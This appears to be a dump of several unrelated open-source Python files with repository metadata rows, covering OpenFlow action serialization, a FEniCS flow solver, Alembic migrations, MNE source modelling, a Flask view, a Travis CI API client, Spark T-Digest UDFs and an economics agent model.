self.mpls_ttl = mpls_ttl
else:
self.mpls_ttl = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!B", self.mpls_ttl))
packed.append('\x00' * 3)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = set_mpls_ttl()
_type = reader.read("!H")[0]
assert(_type == 15)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.mpls_ttl = reader.read("!B")[0]
reader.skip(3)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.mpls_ttl != other.mpls_ttl: return False
return True
def pretty_print(self, q):
q.text("set_mpls_ttl {")
with q.group():
with q.indent(2):
q.breakable()
q.text("mpls_ttl = ");
q.text("%#x" % self.mpls_ttl)
q.breakable()
q.text('}')
action.subtypes[15] = set_mpls_ttl
class set_nw_ttl(action):
type = 23
def __init__(self, nw_ttl=None):
if nw_ttl != None:
self.nw_ttl = nw_ttl
else:
self.nw_ttl = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!B", self.nw_ttl))
packed.append('\x00' * 3)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = set_nw_ttl()
_type = reader.read("!H")[0]
assert(_type == 23)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.nw_ttl = reader.read("!B")[0]
reader.skip(3)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.nw_ttl != other.nw_ttl: return False
return True
def pretty_print(self, q):
q.text("set_nw_ttl {")
with q.group():
with q.indent(2):
q.breakable()
q.text("nw_ttl = ");
q.text("%#x" % self.nw_ttl)
q.breakable()
q.text('}')
action.subtypes[23] = set_nw_ttl
class set_queue(action):
type = 21
def __init__(self, queue_id=None):
if queue_id != None:
self.queue_id = queue_id
else:
self.queue_id = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.queue_id))
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = set_queue()
_type = reader.read("!H")[0]
assert(_type == 21)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.queue_id = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.queue_id != other.queue_id: return False
return True
def pretty_print(self, q):
q.text("set_queue {")
with q.group():
with q.indent(2):
q.breakable()
q.text("queue_id = ");
q.text("%#x" % self.queue_id)
q.breakable()
q.text('}')
action.subtypes[21] = set_queue
|
gpl-2.0
| 3,260,647,571,613,940,000
| 27.317418
| 88
| 0.518843
| false
| 3.653131
| false
| false
| false
|
Juanlu001/CBC.Solve
|
cbc/flow/saddlepointsolver.py
|
1
|
7125
|
__author__ = "Marie E. Rognes"
__copyright__ = "Copyright (C) 2012 Simula Research Laboratory and %s" % __author__
__license__ = "GNU GPL Version 3 or any later version"
# Last changed: 2012-05-01
__all__ = ["TaylorHoodSolver"]
from dolfin import *
from cbc.common.utils import *
from cbc.common import *
class TaylorHoodSolver(CBCSolver):
"""Navier-Stokes solver using a plain saddle point
formulation. This should be ridiculously robust. No boundary
forces allowed."""
def __init__(self, problem):
"Initialize Navier-Stokes solver"
# Initialize base class
CBCSolver.__init__(self)
# Set up parameters
self.parameters = Parameters("solver_parameters")
self.parameters.add("plot_solution", False)
self.parameters.add("save_solution", False)
self.parameters.add("store_solution_data", False)
zero_average_pressure = False
# Get mesh and time step range
mesh = problem.mesh()
dt, t_range = timestep_range_cfl(problem, mesh)
info("Using time step dt = %g" % dt)
# Function spaces
V1 = VectorFunctionSpace(mesh, "CG", 1)
V = VectorFunctionSpace(mesh, "CG", 2)
Q = FunctionSpace(mesh, "CG", 1)
if zero_average_pressure:
R = FunctionSpace(mesh, "R", 0)
W = MixedFunctionSpace([V, Q, R])
else:
W = V*Q
# Coefficients
mu = Constant(problem.viscosity()) # Dynamic viscosity [Ps x s]
rho = Constant(problem.density()) # Density [kg/m^3]
n = FacetNormal(mesh)
k = Constant(dt)
f = problem.body_force(V1)
g = problem.boundary_traction(V1)
w = problem.mesh_velocity(V1)
# If no body forces are specified, assume it is 0
if f == []:
f = Constant((0,)*V1.mesh().geometry().dim())
if g == []:
g = Constant((0,)*V1.mesh().geometry().dim())
# Create boundary conditions
bcu = create_dirichlet_conditions(problem.velocity_dirichlet_values(),
problem.velocity_dirichlet_boundaries(),
W.sub(0))
# Allow this just to be able to set all values directly
bcp = create_dirichlet_conditions(problem.pressure_dirichlet_values(),
problem.pressure_dirichlet_boundaries(),
W.sub(1))
# Create initial conditions
u0 = create_initial_condition(problem.velocity_initial_condition(), V)
u0 = interpolate(u0, V)
p0 = create_initial_condition(problem.pressure_initial_condition(), Q)
p0 = interpolate(p0, Q)
# Create initial function
upr0 = Function(W)
upr0.vector()[:V.dim()] = u0.vector()
upr0.vector()[V.dim():V.dim()+Q.dim()] = p0.vector()
# Create function for solution at previous time
upr_ = Function(W)
upr_.assign(upr0)
if zero_average_pressure:
(u_, p_, r_) = split(upr_)
else:
(u_, p_) = split(upr_)
#u0 = Function(V)
#p0 = Function(Q)
# Test and trial functions
upr = Function(W)
if zero_average_pressure:
(u, p, r) = split(upr)
(v, q, s) = TestFunctions(W)
else:
(u, p) = split(upr)
(v, q) = TestFunctions(W)
u1 = Function(V)
p1 = Function(Q)
# Define Cauchy stress tensor
def sigma(v, p):
return 2.0*mu*sym(grad(v)) - p*Identity(v.cell().d)
# Mixed formulation
U = 0.5*(u_ + u)
F = (rho*(1/k)*inner(u - u_, v)*dx
+ rho*inner(grad(U)*(U - w), v)*dx
+ inner(sigma(U, p), sym(grad(v)))*dx
+ div(U)*q*dx
- inner(f, v)*dx
- inner(g, v)*ds)
if zero_average_pressure:
F += p*s*dx + q*r*dx
# Store variables needed for time-stepping
self.mesh_velocity = w
self.W = W
self.dt = dt
self.k = k
self.t_range = t_range
self.bcu = bcu
self.bcp = bcp
self.f = f
self.g = g
self.upr_ = upr_
self.upr = upr
self.u0 = u0
self.u1 = u1
self.p0 = p0
self.p1 = p1
self.F = F
# Empty file handlers / time series
self.velocity_file = None
self.pressure_file = None
self.velocity_series = None
self.pressure_series = None
# Assemble matrices
self.reassemble()
def solve(self):
"Solve problem and return computed solution (u, p)"
# Time loop
for t in self.t_range:
# Solve for current time step
self.step(self.dt)
# Update
self.update(t)
self._end_time_step(t, self.t_range[-1])
return self.u1, self.p1
def step(self, dt):
"Compute solution for new time step"
# Always do this
self.dt = dt
self.k.assign(dt)
self.reassemble()
# Allow pressure boundary conditions for debugging
bcs = self.bcu
if self.bcp != []:
info_green("Including pressure DirichletBC at your risk")
bcs += self.bcp
# Compute solution
begin("Computing velocity and pressure and multiplier")
solve(self.F == 0, self.upr, bcs)
self.u1.assign(self.upr.split()[0])
self.p1.assign(self.upr.split()[1])
end()
return (self.u1, self.p1)
def update(self, t):
# This is hardly robust
# Update the time on the body force
self.f.t = t
self.g.t = t
# Propagate values
self.upr_.assign(self.upr)
self.u0.assign(self.u1)
self.p0.assign(self.p1)
# Plot solution
if self.parameters["plot_solution"]:
plot(self.p1, title="Pressure", rescale=True)
plot(self.u1, title="Velocity", rescale=True)
# Store solution (for plotting)
if self.parameters["save_solution"]:
if self.velocity_file is None: self.velocity_file = File("velocity.pvd")
if self.pressure_file is None: self.pressure_file = File("pressure.pvd")
self.velocity_file << self.u1
self.pressure_file << self.p1
# Store solution data
if self.parameters["store_solution_data"]:
if self.series is None:
self.series = TimeSeries("velocity-pressure-multiplier")
self.series.store(self.upr.vector(), t)
return self.u1, self.p1
def reassemble(self):
"Reassemble matrices, needed when mesh or time step has changed"
info("(Re)assembling matrices")
info("No action taken here in this solver")
def solution(self):
"Return current solution values"
return self.u1, self.p1
def solution_values(self):
"Return solution values at t_{n-1} and t_n"
return (self.u0, self.u1, self.p0, self.p1)
|
gpl-3.0
| 742,052,942,741,142,500
| 30.113537
| 84
| 0.543298
| false
| 3.66701
| false
| false
| false
|
GaretJax/irco
|
irco/migrations/env.py
|
1
|
2676
|
from __future__ import with_statement
from alembic import context
from sqlalchemy import engine_from_config, pool
from logging.config import dictConfig
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This line sets up loggers basically.
dictConfig({
'version': 1,
'formatters': {
'generic': {
'format': '%(levelname)-5.5s [%(name)s] %(message)s',
'datefmt': '%H:%M:%S',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'generic',
}
},
'loggers': {
'root': {
'level': 'WARN',
'handlers': ['console'],
},
'sqlalchemy': {
'level': 'WARN',
'handlers': ['console'],
'qualname': 'sqlalchemy.engine',
},
'alembic': {
'level': 'INFO',
'handlers': ['console'],
'qualname': 'alembic',
},
}
})
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = None
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
url = config.get_main_option("sqlalchemy.url")
context.configure(url=url, target_metadata=target_metadata)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
engine = engine_from_config(
config.get_section(config.config_ini_section),
prefix='sqlalchemy.',
poolclass=pool.NullPool
)
connection = engine.connect()
context.configure(
connection=connection,
target_metadata=target_metadata
)
try:
with context.begin_transaction():
context.run_migrations()
finally:
connection.close()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
|
mit
| 2,895,014,743,879,245,000
| 24.730769
| 69
| 0.610613
| false
| 4.091743
| true
| false
| false
|
MadsJensen/malthe_alpha_project
|
make_inverse_operator.py
|
1
|
1501
|
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 31 10:00:32 2015
@author: mje
"""
import mne
from mne.minimum_norm import (make_inverse_operator, apply_inverse,
write_inverse_operator)
import socket
import numpy as np
import matplotlib.pyplot as plt
# Setup paths and prepare raw data
hostname = socket.gethostname()
if hostname == "Wintermute":
data_path = "/home/mje/mnt/caa/scratch/"
n_jobs = 1
else:
data_path = "/projects/MINDLAB2015_MEG-CorticalAlphaAttention/scratch/"
n_jobs = 1
subjects_dir = data_path + "fs_subjects_dir/"
fname_fwd = data_path + '0001-fwd.fif'
fname_cov = data_path + '0001-cov.fif'
fname_evoked = data_path + "0001_p_03_filter_ds_ica-mc_raw_tsss-ave.fif"
snr = 1.0
lambda2 = 1.0 / snr ** 2
# Load data
evoked = mne.read_evokeds(fname_evoked, condition=0, baseline=(None, 0))
forward_meeg = mne.read_forward_solution(fname_fwd, surf_ori=True)
noise_cov = mne.read_cov(fname_cov)
# Restrict forward solution as necessary for MEG
forward_meg = mne.pick_types_forward(forward_meeg, meg=True, eeg=False)
# Alternatively, you can just load a forward solution that is restricted
# make an M/EEG, MEG-only, and EEG-only inverse operators
inverse_operator_meg = make_inverse_operator(evoked.info, forward_meg,
noise_cov,
loose=0.2, depth=0.8)
write_inverse_operator('0001-meg-oct-6-inv.fif',
inverse_operator_meg)
|
mit
| 4,213,506,564,462,215,000
| 30.93617
| 75
| 0.655563
| false
| 3.146751
| false
| false
| false
|
tyler274/Recruitment-App
|
recruit_app/ia/views.py
|
1
|
1374
|
from flask import Blueprint, render_template, flash, redirect, request, url_for, current_app
from flask_security.decorators import login_required
from flask_security import current_user
from recruit_app.ia.managers import IaManager
from recruit_app.user.eve_api_manager import EveApiManager
from recruit_app.ia.forms import SubmitIssueForm
blueprint = Blueprint("ia", __name__, url_prefix='/ia', static_folder="../static")
@blueprint.route("/submit_issue", methods=['GET', 'POST'])
@login_required
def submit_issue():
# Check if user is in Karmafleet (98370861)
if not EveApiManager.check_if_character_is_in_corp(int(current_user.main_character_id), 98370861):
flash('You are not a current KarmaFleet member.', 'error')
return redirect(url_for('public.home'))
form = SubmitIssueForm()
# Display for if get, submit if POST
if request.method == 'POST':
if form.validate_on_submit():
# Do the submission
if IaManager.submit_issue(current_user, form.subject.data, form.body.data, form.logs.data):
flash('Issue submitted successfully.', 'info')
else:
flash('Error submitting issue. Please try again later.', 'error')
return redirect(url_for('public.home'))
# GET
return render_template('ia/submit_issue.html', form=form)
|
bsd-3-clause
| -1,894,737,977,002,553,900
| 40.666667
| 103
| 0.676128
| false
| 3.754098
| false
| false
| false
|
menegazzo/travispy
|
travispy/entities/repo.py
|
2
|
2715
|
from ._stateful import Stateful
class Repo(Stateful):
'''
:ivar str slug:
Repository slug.
:ivar str description:
Description on |github|.
:ivar int last_build_id:
Build ID of the last executed build.
:ivar str last_build_number:
Build number of the last executed build.
:ivar str last_build_state:
Build state of the last executed build.
:ivar str last_build_duration:
Build duration of the last executed build.
:ivar str last_build_started_at:
Build started at of the last executed build.
:ivar str last_build_finished_at:
Build finished at of the last executed build.
:ivar str github_language:
Language on |github|.
:ivar bool active:
Whether or not the repository is active on |travisci|.
'''
__slots__ = [
'slug',
'description',
'last_build_id',
'last_build_number',
'last_build_state',
'last_build_duration',
'last_build_started_at',
'last_build_finished_at',
'last_build_language',
'github_language',
'active',
]
@property
def state(self):
'''
:class:`.Repo` state is given through ``last_build_state``.
.. seealso:: :class:`.Stateful` for ``state`` full documentation.
'''
return self.last_build_state
@property
def last_build(self):
'''
:rtype: :class:`.Build`
:returns:
A :class:`.Build` object with information related to current ``last_build_id``.
'''
from .build import Build
return self._load_one_lazy_information(Build, 'last_build_id')
@classmethod
def find_one(cls, session, entity_id, **kwargs):
result = super(Repo, cls).find_one(session, entity_id, **kwargs)
return result
def _set_hook(self, flag):
response = self._session.put(
self._session.uri + '/hooks/{}'.format(self.id),
json={"hook": {"active": flag}},
)
result = response.status_code == 200
if result:
self.active = flag
return result
def disable(self):
'''
Disable Travis CI for the repository.
:rtype: bool
:returns:
``True`` if API call was successful.
``False`` if API call was unsuccessful.
'''
return self._set_hook(False)
def enable(self):
'''
Enable Travis CI for the repository
:rtype: bool
:returns:
``True`` if API call was successful
``False`` if API call was unsuccessful
'''
return self._set_hook(True)
|
gpl-3.0
| -575,740,151,106,898,900
| 24.857143
| 91
| 0.559116
| false
| 4.202786
| false
| false
| false
|
isarn/isarn-sketches-spark
|
python/isarnproject/sketches/spark/tdigest.py
|
1
|
14993
|
import sys
import random
import itertools as it
from bisect import bisect_left, bisect_right
from pyspark.sql.types import UserDefinedType, StructField, StructType, \
ArrayType, DoubleType, IntegerType
from pyspark.sql.column import Column, _to_java_column, _to_seq
from pyspark.context import SparkContext
__all__ = ['tdigestIntUDF', 'tdigestLongUDF', 'tdigestFloatUDF', 'tdigestDoubleUDF', \
'tdigestMLVecUDF', 'tdigestMLLibVecUDF', \
'tdigestIntArrayUDF', 'tdigestLongArrayUDF', 'tdigestFloatArrayUDF', 'tdigestDoubleArrayUDF', \
'tdigestReduceUDF', 'tdigestArrayReduceUDF', \
'TDigest']
def tdigestIntUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of integer data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestIntUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestLongUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of long integer data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestLongUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestFloatUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of (single precision) float data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestFloatUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestDoubleUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of double float data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestDoubleUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestMLVecUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of ML Vector data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestMLVecUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestMLLibVecUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of MLLib Vector data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestMLLibVecUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestIntArrayUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of integer-array data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestIntArrayUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestLongArrayUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of long-integer array data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestLongArrayUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestFloatArrayUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of (single-precision) float array data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestFloatArrayUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestDoubleArrayUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of double array data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestDoubleArrayUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestReduceUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of t-digests.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestReduceUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestArrayReduceUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of t-digest vectors.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestArrayReduceUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
class TDigestUDT(UserDefinedType):
@classmethod
def sqlType(cls):
return StructType([
StructField("compression", DoubleType(), False),
StructField("maxDiscrete", IntegerType(), False),
StructField("cent", ArrayType(DoubleType(), False), False),
StructField("mass", ArrayType(DoubleType(), False), False)])
@classmethod
def module(cls):
return "isarnproject.sketches.udt.tdigest"
@classmethod
def scalaUDT(cls):
return "org.apache.spark.isarnproject.sketches.udtdev.TDigestUDT"
def simpleString(self):
return "tdigest"
def serialize(self, obj):
if isinstance(obj, TDigest):
return (obj.compression, obj.maxDiscrete, obj._cent, obj._mass)
else:
raise TypeError("cannot serialize %r of type %r" % (obj, type(obj)))
def deserialize(self, datum):
return TDigest(datum[0], datum[1], datum[2], datum[3])
class TDigest(object):
"""
A T-Digest sketch of a cumulative numeric distribution.
This is a "read-only" python mirror of org.isarnproject.sketches.java.TDigest which supports
all cdf and sampling methods, but does not currently support update with new data. It is
assumed to have been produced with a t-digest aggregating UDF, also exposed in this package.
"""
# Because this is a value and not a function, TDigestUDT has to be defined above,
# and in the same file.
__UDT__ = TDigestUDT()
def __init__(self, compression, maxDiscrete, cent, mass):
self.compression = float(compression)
self.maxDiscrete = int(maxDiscrete)
assert self.compression > 0.0, "compression must be > 0"
assert self.maxDiscrete >= 0, "maxDiscrete must be >= 0"
self._cent = [float(v) for v in cent]
self._mass = [float(v) for v in mass]
assert len(self._mass) == len(self._cent), "cluster mass and cent must have same dimension"
self.nclusters = len(self._cent)
# Current implementation is "read only" so we can just store cumulative sum here.
# To support updating, 'csum' would need to become a Fenwick tree array
self._csum = list(it.accumulate(self._mass))
def __repr__(self):
return "TDigest(%s, %s, %s, %s)" % \
(repr(self.compression), repr(self.maxDiscrete), repr(self._cent), repr(self._mass))
def mass(self):
"""
Total mass accumulated by this TDigest
"""
if len(self._csum) == 0: return 0.0
return self._csum[-1]
def size(self):
"""
Number of clusters in this TDigest
"""
return len(self._cent)
def isEmpty(self):
"""
Returns True if this TDigest is empty, False otherwise
"""
return len(self._cent) == 0
def __reduce__(self):
return (self.__class__, (self.compression, self.maxDiscrete, self._cent, self._mass, ))
def _lmcovj(self, m):
assert self.nclusters >= 2
assert (m >= 0.0) and (m <= self.mass())
return bisect_left(self._csum, m)
def _rmcovj(self, m):
assert self.nclusters >= 2
assert (m >= 0.0) and (m <= self.mass())
return bisect_right(self._csum, m) - 1
def _rcovj(self, x):
return bisect_right(self._cent, x) - 1
# emulates behavior from isarn java TDigest, which computes
# cumulative sum via a Fenwick tree
def _ftSum(self, j):
if (j < 0): return 0.0
if (j >= self.nclusters): return self.mass()
return self._csum[j]
def cdf(self, xx):
"""
Return CDF(x) of a numeric value x, with respect to this TDigest CDF sketch.
"""
x = float(xx)
j1 = self._rcovj(x)
if (j1 < 0): return 0.0
if (j1 >= self.nclusters - 1): return 1.0
j2 = j1 + 1
c1 = self._cent[j1]
c2 = self._cent[j2]
tm1 = self._mass[j1]
tm2 = self._mass[j2]
s = self._ftSum(j1 - 1)
d1 = 0.0 if (j1 == 0) else tm1 / 2.0
m1 = s + d1
m2 = m1 + (tm1 - d1) + (tm2 if (j2 == self.nclusters - 1) else tm2 / 2.0)
m = m1 + (x - c1) * (m2 - m1) / (c2 - c1)
return min(m2, max(m1, m)) / self.mass()
def cdfInverse(self, qq):
"""
Given a value q on [0,1], return the value x such that CDF(x) = q.
Returns NaN for any q > 1 or < 0, or if this TDigest is empty.
"""
q = float(qq)
if (q < 0.0) or (q > 1.0): return float('nan')
if (self.nclusters == 0): return float('nan')
if (self.nclusters == 1): return self._cent[0]
if (q == 0.0): return self._cent[0]
if (q == 1.0): return self._cent[self.nclusters - 1]
m = q * self.mass()
j1 = self._rmcovj(m)
j2 = j1 + 1
c1 = self._cent[j1]
c2 = self._cent[j2]
tm1 = self._mass[j1]
tm2 = self._mass[j2]
s = self._ftSum(j1 - 1)
d1 = 0.0 if (j1 == 0) else tm1 / 2.0
m1 = s + d1
m2 = m1 + (tm1 - d1) + (tm2 if (j2 == self.nclusters - 1) else tm2 / 2.0)
x = c1 + (m - m1) * (c2 - c1) / (m2 - m1)
return min(c2, max(c1, x))
def cdfDiscrete(self, xx):
"""
return CDF(x) for a numeric value x, assuming the sketch is representing a
discrete distribution.
"""
x = float(xx)
j = self._rcovj(x)
return self._ftSum(j) / self.mass()
def cdfDiscreteInverse(self, qq):
"""
Given a value q on [0,1], return the value x such that CDF(x) = q, assuming
the sketch is represenging a discrete distribution.
Returns NaN for any q > 1 or < 0, or if this TDigest is empty.
"""
q = float(qq)
if (q < 0.0) or (q > 1.0): return float('nan')
if self.nclusters == 0: return float('nan')
if self.nclusters == 1: return self._cent[0]
m = q * self.mass()
j = self._lmcovj(m)
return self._cent[j]
def samplePDF(self):
"""
Return a random sampling from the sketched distribution, using inverse
transform sampling, assuming a continuous distribution.
"""
return self.cdfInverse(random.random())
def samplePMF(self):
"""
Return a random sampling from the sketched distribution, using inverse
transform sampling, assuming a discrete distribution.
"""
return self.cdfDiscreteInverse(random.random())
def sample(self):
"""
Return a random sampling from the sketched distribution, using inverse
transform sampling, assuming a discrete distribution if the number of
TDigest clusters is <= maxDiscrete, and a continuous distribution otherwise.
"""
if self.maxDiscrete <= self.nclusters:
return self.cdfDiscreteInverse(random.random())
return self.cdfInverse(random.random())
|
apache-2.0
| -8,566,851,161,304,078,000
| 38.981333
| 106
| 0.649503
| false
| 3.575721
| false
| false
| false
|
ntuecon/pubfin
|
economy/agents.py
|
1
|
5147
|
'''
Created on Apr 16, 2018
@author: Hendrik Rommeswinkel
'''
import numpy as np
from scipy.optimize import minimize
from utility import Utility,Profit,GoodFactorUtility,CESUtility
from technology import LinearTechnology
from technology import DRSTechnology
class Agent(object):
'''
An agent contains an objective. When asked to optimize(), the agent maximizes the objective given constraints and bounds on the variables.
'''
def __init__(self, objective=Utility(), env=dict()):
'''
Constructor
'''
self.objective = objective
#Perhaps the env should instead be an argument to optimize()?
#In case an environment is provided, use this environment
self.env = env
#The problemsize needs to be manually rewritten in case it is not equal to 1
self.problemsize = 1
def optimize(self, bounds=None, constraints=None):
#The env tells us how large the dimension of the initial guess has to be
x0 = np.ones(self.problemsize)
opt = minimize(self.objective, x0, args=self.env, method='SLSQP', bounds=bounds, constraints=constraints.append(self.env['constraints']))
if opt['success']==0:
# If the optimization problem could not be solved, we need to raise an error.
raise ValueError("Optimization problem could not be solved.")
return opt['x']
class Consumer(Agent):
'''
A consumer is an agent who has a utility function as the objective and no internal constraints
Setting env is required as there are both goods and factors to be chosen
Constraints for the consumer need to be supplied by the economy
'''
def __init__(self, objective=Utility(), env=dict()):
'''
Constructor
'''
self.env = {'constraints': (), }
self.env.update(env)
self.problemsize = len(self.env['goods']) + len(self.env['factors'])
self.objective=objective
def consume(self, c, env=dict()):
#We update the env by env keys already in self.env
env.update(self.env)
if not 'transfers' in env:
env['transfers'] = np.zeros(self.problemsize)
print "No transfers found"
return self.objective(c + env['transfers'])
def optimize(self, bounds=None, constraints=(), env=dict()):
x0 = np.ones(self.problemsize)
env.update(self.env)
opt = minimize(self.consume, x0, args=(env,), method='SLSQP', bounds=bounds, constraints=constraints+env['constraints'])
if opt['success']==0:
raise ValueError("Optimization problem could not be solved.")
print opt
return opt['x']
class Producer(Agent):
'''
A producer is an agent who has a technology as a constraint and maximizes payoffs
The economy needs to supply prices
'''
def __init__(self, objective=Profit(), technology=None, env=None):
'''
Constructor
'''
self.objective = objective
if technology == None:
technology = DRSTechnology(env)
self.constraints = [{'type': 'ineq', 'fun':technology}]
#In case an environment is provided, use this environment
self.env = env
self.problemsize = len(self.env['goods']) + len(self.env['factors'])
'''
For a producer, optimization is slightly different since for a linear technology the optimum is not unique.
'''
if self.technology==LinearTechnology:
raise ValueError("No support for linear technologies yet")
else:
pass
class Government(Agent):
'''
The government maximizes a social welfare function. We assume a utilitarian SWF.
'''
def __init__(self, objective, env=None):
'''
Constructor
'''
self.objective = objective
self.constraints = {}
#In case an environment is provided, use this environment
self.env = env
#The problem size for the government is the number of consumers among who to do lump-sum transfers
#We only need to redistribute a single good lump-sum for a well-behaved problem. More generally, we could redistribute all goods lump-sum.
self.problemsize = len(self.env['consumers'])
conradsPreferences = {'scale': -1,
'shift': 0,
'elasticity': -2,
'exponent': .5,
'weights': np.array([2,1,1,1,1])
}
environment = {'goods' : [1,2,3,4,5], 'factors' : [], 'transfers' : np.array([0,.3,0,0,0])}
conrad = Consumer(objective = CESUtility(conradsPreferences), env=environment)
